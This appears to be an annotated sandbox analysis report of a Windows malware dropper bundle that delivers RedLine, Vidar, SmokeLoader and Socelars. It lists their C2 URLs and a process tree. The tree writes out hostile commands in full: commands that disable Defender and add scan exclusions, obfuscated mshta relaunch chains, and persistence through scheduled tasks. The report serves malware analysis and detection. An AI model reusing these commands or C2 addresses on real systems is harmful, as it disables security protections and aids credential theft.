Analysis

  max time kernel: 154s
  max time network: 153s
  platform: windows10_x64
  resource: win10-en-20211208
  submitted: 20/12/2021, 14:03

  Static task static1
  Behavioral task behavioral1: Sample 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe, Resource win7-en-20211208
  Behavioral task behavioral2: Sample 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe, Resource win10-en-20211208

  All signature hits (yara resources prefixed behavioral2/) and the process tree below come from behavioral2, the win10-en-20211208 run named as the platform above.

General

  Target: 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
  Size: 6.7MB
  MD5: 09627559587e099b024796e1b61fbd4c
  SHA1: 28cab95f8d7262958b09a3a622ff14196a05d52a
  SHA256: 42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d
  SHA512: b8bc5e8afa775a7878e82e6a6fea355a1c61018bdafc9967f8b136ef999490b655daa4ae551c152b7f1e092797929e17f8bfa2d6d5d89865d078d03fe91c94ae
Malware Config

Extracted: socelars
  C2: http://www.biohazardgraphics.com/

Extracted: vidar
  Version: 49.1
  profile_id: 915
  C2 lookup URLs (dead-drop profiles on public Mastodon instances; the live C2 address is read from the profile page, which is what the "Legitimate hosting services abused for malware hosting/C2" signature below refers to):
    https://noc.social/@sergeev46
    https://c.im/@sergeev47

Extracted: smokeloader
  Version: 2020
  C2:
    http://rcacademy.at/upload/
    http://e-lanpengeonline.com/upload/
    http://vjcmvz.cn/upload/
    http://galala.ru/upload/
    http://witra.ru/upload/
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid 2344, pid_target 1920, Process rundll32.exe, procid_target 125
  (a child of the WMI provider host is the pattern left by Win32_Process.Create; the rundll32 instance is not in the process tree excerpt below)

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (4 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/3772-287-0x0000000000B20000-0x0000000000CEF000-memory.dmp    family_redline
  behavioral2/memory/3772-295-0x0000000000B20000-0x0000000000CEF000-memory.dmp    family_redline
  behavioral2/memory/3956-312-0x00000000011A0000-0x000000000136F000-memory.dmp    family_redline
  behavioral2/memory/1944-372-0x0000000000419332-mapping.dmp                      family_redline
  (PIDs 3772 and 3956 are 51bda4e0-9596-4be7-9c5f-e572e49e6715.exe and c134ee86-6bbb-4bdb-a875-483c4d842708.exe in the process tree, the two processes that also call NtSetInformationThread ThreadHideFromDebugger)

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x000500000001ab63-151.dat  family_socelars
  behavioral2/files/0x000500000001ab63-177.dat  family_socelars

NirSoft WebBrowserPassView (4 IoCs)
Password recovery tool for various web browsers
  resource                                                                       yara_rule
  behavioral2/files/0x000500000001ab6d-159.dat                                   WebBrowserPassView
  behavioral2/files/0x000500000001ab6d-179.dat                                   WebBrowserPassView
  behavioral2/memory/4592-305-0x0000000000400000-0x000000000047C000-memory.dmp    WebBrowserPassView
  behavioral2/files/0x000600000001ab7c-304.dat                                   WebBrowserPassView

Nirsoft (7 IoCs)
  resource                                                                       yara_rule
  behavioral2/files/0x000500000001ab6d-159.dat                                   Nirsoft
  behavioral2/files/0x000500000001ab6d-179.dat                                   Nirsoft
  behavioral2/memory/2984-252-0x0000000000400000-0x0000000000455000-memory.dmp    Nirsoft
  behavioral2/files/0x000500000001ab7b-251.dat                                   Nirsoft
  behavioral2/files/0x000500000001ab7b-250.dat                                   Nirsoft
  behavioral2/memory/4592-305-0x0000000000400000-0x000000000047C000-memory.dmp    Nirsoft
  behavioral2/files/0x000600000001ab7c-304.dat                                   Nirsoft
  (PIDs 2984 and 4592 are both listed as 11111.exe under "Executes dropped EXE": the bundle carries NirSoft recovery tools under a generic name)

Vidar Stealer (2 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/1492-272-0x0000000002220000-0x00000000022F9000-memory.dmp    family_vidar
  behavioral2/memory/1492-282-0x0000000000400000-0x000000000053A000-memory.dmp    family_vidar
  (PID 1492 is Sat1266d17883454b1.exe)

Packer: aspack_v212_v242 (7 IoCs; ASPack 2.12 to 2.42 by rule name)
  resource                                      yara_rule
  behavioral2/files/0x000200000001ab5d-123.dat  aspack_v212_v242
  behavioral2/files/0x000200000001ab5d-125.dat  aspack_v212_v242
  behavioral2/files/0x000200000001ab5b-124.dat  aspack_v212_v242
  behavioral2/files/0x000200000001ab5b-130.dat  aspack_v212_v242
  behavioral2/files/0x000200000001ab5b-128.dat  aspack_v212_v242
  behavioral2/files/0x000500000001ab60-127.dat  aspack_v212_v242
  behavioral2/files/0x000500000001ab60-131.dat  aspack_v212_v242
Downloads MZ/PE file

Executes dropped EXE (29 IoCs)
  pid   Process
  4316  setup_installer.exe
  4004  setup_install.exe
  1492  Sat1266d17883454b1.exe
  1876  Sat128942fc3c9a4e75.exe
  1912  Sat123037f78f205c.exe
  2080  Sat125c6837fefc9.exe
  2084  Sat1283d3fd9a.exe
  2360  Sat1246754647.exe
  2876  Sat127b52b8f420b.exe
  3264  Sat1296f0ebf057bb0b.exe
  4748  Sat126518fd66e0120.exe
  4980  Sat12b734b9ff65fd19.exe
  2724  Sat12faf3464bdfb3c.exe
  4184  Sat125bf3a6108a6f5e.exe
  4216  Sat12d67b11255d.exe
  1964  Sat12285b225fb.exe
  1572  Sat12285b225fb.exe
  3208  Sat12faf3464bdfb3c.exe
  3124  Sat1246754647.tmp
  2412  Sat1246754647.exe
  2984  11111.exe
  4704  Sat1246754647.tmp
  3212  c8418d7b-b6c4-4659-b441-07aac87c585e.exe
  4244  82479f0a-b741-43b9-b53a-c3bb2ed58093.exe
  3772  51bda4e0-9596-4be7-9c5f-e572e49e6715.exe
  3956  c134ee86-6bbb-4bdb-a875-483c4d842708.exe
  4592  11111.exe
  4568  3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe
  5116  5207433252074332.exe
  (the Sat12*.exe files are the components setup_install.exe unpacks into its 7zSCD050576 directory and launches through cmd.exe /c; only four of those subtrees appear in the process listing below)

Modifies Windows Firewall (1 TTP)

Loads dropped DLL (12 IoCs)
  pid   Process                 count
  4004  setup_install.exe       6
  3124  Sat1246754647.tmp       1
  4704  Sat1246754647.tmp       1
  4552  rundll32.exe            2
  4692  regsvr32.exe            2

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\218457123 = "C:\\Users\\Admin\\AppData\\Roaming\\57308631\\5207433252074332.exe"
  Process: 82479f0a-b741-43b9-b53a-c3bb2ed58093.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  24    ip-api.com
  44    ipinfo.io
  45    ipinfo.io
  66    ipinfo.io
  204   ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  3772  51bda4e0-9596-4be7-9c5f-e572e49e6715.exe
  3956  c134ee86-6bbb-4bdb-a875-483c4d842708.exe
  (a common anti-debug call: once ThreadHideFromDebugger is set, debug events from that thread are no longer delivered to an attached debugger; both PIDs also carry the RedLine yara hits above)

Suspicious use of SetThreadContext (1 IoC)
  PID 1964 set thread context of 1572; Process Sat12285b225fb.exe; procid_target 105
  (both PIDs are Sat12285b225fb.exe in the "Executes dropped EXE" list: a parent rewriting the thread context of a fresh copy of itself is the pattern of process hollowing / RunPE-style injection)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(generic description from the sandbox; no ransomware family is identified anywhere in this report)

Program crash (2 IoCs)
  pid   pid_target  Process       procid_target
  2728  3224        WerFault.exe  167
  2480  4544        WerFault.exe  160
  (the crashing processes are the second KAD91NfhI1G1vIiW1WBr__4y.exe instance and Y34pZCu0tloDrEzADK1GfR0B.exe in the tree below)

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   Sat12b734b9ff65fd19.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   Sat12b734b9ff65fd19.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   Sat12b734b9ff65fd19.exe

Creates scheduled task(s) (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process       task (from the process tree below)
  5920  schtasks.exe  "gbPcfYwfQ": one-shot hidden PowerShell -EncodedCommand
  5900  schtasks.exe  "Timer": c:\windows\system\svchost.exe every 7 minutes as SYSTEM
  2304  schtasks.exe  "PowerControl LG": PowerControl_Svc.exe at logon, /rl HIGHEST
  4696  schtasks.exe  "PowerControl HR": PowerControl_Svc.exe hourly, /rl HIGHEST

Kills process with taskkill (3 IoCs)
  pid   Process
  3856  taskkill.exe
  4264  taskkill.exe  (taskkill /f /im chrome.exe in the tree below)
  1300  taskkill.exe

Modifies registry class (1 IoC)
  Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings   Sat127b52b8f420b.exe

Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
  flow 29, HTTP User-Agent header: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  (the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, i.e. an HTTP request issued from script rather than a browser)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process                                    count
  4980  Sat12b734b9ff65fd19.exe                    2
  300   powershell.exe                             2
  396   powershell.exe                             2
  3772  51bda4e0-9596-4be7-9c5f-e572e49e6715.exe   2
  2080  Sat125c6837fefc9.exe                       56

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  4980  Install.exe
  (PID 4980 is Sat12b734b9ff65fd19.exe in the two lists above and Install.exe here and in the process tree; the OS reused the PID during the run)
Suspicious use of AdjustPrivilegeToken (41 IoCs)
  pid   Process                                    Token
  4748  Sat126518fd66e0120.exe                     SeDebugPrivilege
  1912  Sat123037f78f205c.exe                      SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
        (34 entries covering every privilege LUID from 2 to 35: the process tried to enable all privileges in its token in one sweep; the sandbox leaves 31 to 35 numeric, which by LUID are SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege)
  1876  Sat128942fc3c9a4e75.exe                    SeDebugPrivilege
  4216  Sat12d67b11255d.exe                        SeDebugPrivilege
  300   powershell.exe                             SeDebugPrivilege
  396   powershell.exe                             SeDebugPrivilege
  3856  taskkill.exe                               SeDebugPrivilege
  4568  3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe   SeDebugPrivilege
Suspicious use of WriteProcessMemory (64 IoCs; the listing is capped at 64 entries, the last edge is cut short)
  pid   Process                                                                   wrote to  procid_target  count
  3672  42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe      4316      69             3
  4316  setup_installer.exe                                                       4004      70             3
  4004  setup_install.exe                                                         4424      73             3
  4004  setup_install.exe                                                         4436      74             3
  4004  setup_install.exe                                                         4716      75             3
  4004  setup_install.exe                                                         520       76             3
  4004  setup_install.exe                                                         588       77             3
  4004  setup_install.exe                                                         780       78             3
  4004  setup_install.exe                                                         912       79             3
  4004  setup_install.exe                                                         1088      81             3
  4004  setup_install.exe                                                         1208      82             3
  4004  setup_install.exe                                                         1360      84             3
  4004  setup_install.exe                                                         1616      93             3
  4004  setup_install.exe                                                         1784      92             3
  4436  cmd.exe                                                                   300       80             3
  4424  cmd.exe                                                                   396       83             3
  912   cmd.exe                                                                   1492      85             3
  780   cmd.exe                                                                   1876      86             2
  588   cmd.exe                                                                   1912      91             3
  1088  cmd.exe                                                                   2084      90             3
  520   cmd.exe                                                                   2080      89             3
  4716  cmd.exe                                                                   2360      88             2
Processes (behavioral2)
Indented by tree depth. Each entry gives the image path, then the command line where it differs from the bare quoted image path, the PID, and the signatures attributed to that process.

[1] C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
    PID 3672; Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      PID 4316; Executes dropped EXE; Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe
        PID 4004; Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          PID 4424; Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            PID 396; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            (turns off Defender real-time monitoring, sample submission and cloud (MAPS) reporting before anything else is dropped)
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          PID 4436; Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            PID 300; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            (excludes the drop directory from scanning; every Sat12*.exe component runs from a subfolder of it)
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Sat1246754647.exe
          PID 4716; Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
            cmd: Sat1246754647.exe
            PID 2360; Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp" /SL5="$5003A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe"
              PID 3124; Executes dropped EXE; Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                PID 2412; Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp" /SL5="$50030,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                  PID 4704; Executes dropped EXE; Loads dropped DLL
                  (the is-XXXXX.tmp stub with a /SL5= argument is an Inno Setup installer; here it re-launches itself with /SILENT)
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Sat125c6837fefc9.exe
          PID 520; Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125c6837fefc9.exe
            cmd: Sat125c6837fefc9.exe
            PID 2080; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
            (the bundle's downloader: every direct child below is written to C:\Users\Admin\Pictures\Adobe Films\ under a random name)
          [6] C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe
              PID 4120
          [6] C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe
              PID 2160
          [6] C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe
              PID 1140
            [7] C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe
                PID 5904
            [7] C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                PID 2304; Creates scheduled task(s)
            [7] C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                PID 4696; Creates scheduled task(s)
                (two persistence tasks for the same binary, at logon and hourly, both at the highest run level)
          [6] C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe
              PID 5088
          [6] C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe
              PID 1840
            [7] C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe
                PID 6108
            [7] C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe
                PID 2396
            [7] C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe
                PID 5276
            [7] C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe
                PID 4900
            [7] C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe
                PID 4572
          [6] C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe
              PID 4312
          [6] C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe
              PID 2136
          [6] C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe
              PID 2128
          [6] C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
              PID 4024
            [7] C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
                PID 3224
              [8] C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 24
                  PID 2728; Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
              PID 2728 (reused after the WerFault.exe instance above had exited)
            [7] C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
                PID 4212
          [6] C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe
              PID 3852
              (a second bundle inside the first: each child below is dropped to C:\Users\Admin\AppData\Local\Temp\, several under names that imitate Chrome or installers)
            [7] C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe
                PID 4996
            [7] C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                PID 3780
              [8] C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u
                  PID 5152
            [7] C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
                PID 1972
            [7] C:\Users\Admin\AppData\Local\Temp\inst.exe
                PID 4780
            [7] C:\Users\Admin\AppData\Local\Temp\setup.exe
                PID 2948
            [7] C:\Users\Admin\AppData\Local\Temp\setup1.exe
                PID 5200
            [7] C:\Users\Admin\AppData\Local\Temp\racoon.exe
                PID 5312
            [7] C:\Users\Admin\AppData\Local\Temp\askhelp.exe
                PID 5400
            [7] C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                PID 5724
            [7] C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                PID 5832
            [7] C:\Users\Admin\AppData\Local\Temp\logger.exe
                PID 5912
            [7] C:\Users\Admin\AppData\Local\Temp\chrome.exe
                PID 6000
            [7] C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                PID 6136
            [7] C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                PID 720
          [6] C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe
              PID 3864
          [6] C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe
              PID 4664
            [7] C:\Windows\SysWOW64\mshta.exe
                cmd: "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )
                PID 1112
                (mixed-case inline VBScript run through mshta: it copies the dropper byte-for-byte with TYPE into ..\ZCJQBxDe1bLl.exE, starts the copy with a marker argument, then taskkills the original by image name; the case mangling and the empty-string If are there to defeat string-matching rules)
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmd: "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe" ) do taskkill /iM "%~Nxe" -f
                  PID 6124
                [9] C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE
                    cmd: ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe
                    PID 360
          [6] C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe
              PID 4816
          [6] C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe
              PID 3184
            [7] C:\Users\Admin\AppData\Local\Temp\7zS98FB.tmp\Install.exe
                cmd: .\Install.exe
                PID 4980; Suspicious behavior: MapViewOfSection
              [8] C:\Users\Admin\AppData\Local\Temp\7zSBD0D.tmp\Install.exe
                  cmd: .\Install.exe /S /site_id "525403"
                  PID 1928
                  (everything below is this installer's Defender tampering; forfiles /p c:\windows\system32 /m <file> /c "..." is used as an execution proxy so that the cmd.exe children are parented by forfiles.exe rather than by Install.exe)
                [9] C:\Windows\SysWOW64\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                    PID 5340
                  [10] C:\Windows\SysWOW64\forfiles.exe
                       cmd: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                       PID 6056
                    [11] C:\Windows\SysWOW64\cmd.exe
                         cmd: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                         PID 5524
                         (ThreatIDDefaultAction_Actions=6 is Allow in the MSFT_MpPreference enumeration: Defender is told to permit the threat IDs 2147735503, 2147737010, 2147737007 and 2147737394 named in the four chained forfiles commands; only the first forfiles/cmd pair appears in this excerpt)
                [9] C:\Windows\SysWOW64\forfiles.exe
                    cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                    PID 5264
                  [10] C:\Windows\SysWOW64\cmd.exe
                       cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                       PID 1676
                    [11] \??\c:\windows\SysWOW64\reg.exe
                         cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                         PID 5188
                         (a policy-level exclusion for every .exe file, written to the 32-bit registry view; the /reg:64 twin is not in this excerpt)
                [9] C:\Windows\SysWOW64\forfiles.exe
                    cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                    PID 2332
                  [10] C:\Windows\SysWOW64\cmd.exe
                       cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                       PID 5884
                    [11] \??\c:\windows\SysWOW64\reg.exe
                         cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                         PID 2032
                    [11] \??\c:\windows\SysWOW64\reg.exe
                         cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                         PID 1784
                         (SpyNetReporting=0 disables MAPS cloud reporting by policy, in both registry views)
                [9] C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /CREATE /TN "gbPcfYwfQ" /SC once /ST 02:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    PID 5920; Creates scheduled task(s)
                    (-EncodedCommand takes base64 of UTF-16LE text; this one decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, which applies the policy keys written above without waiting for the next policy refresh)
                [9] C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /run /I /tn "gbPcfYwfQ"
                    PID 32
          [6] C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe
              PID 1620
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe
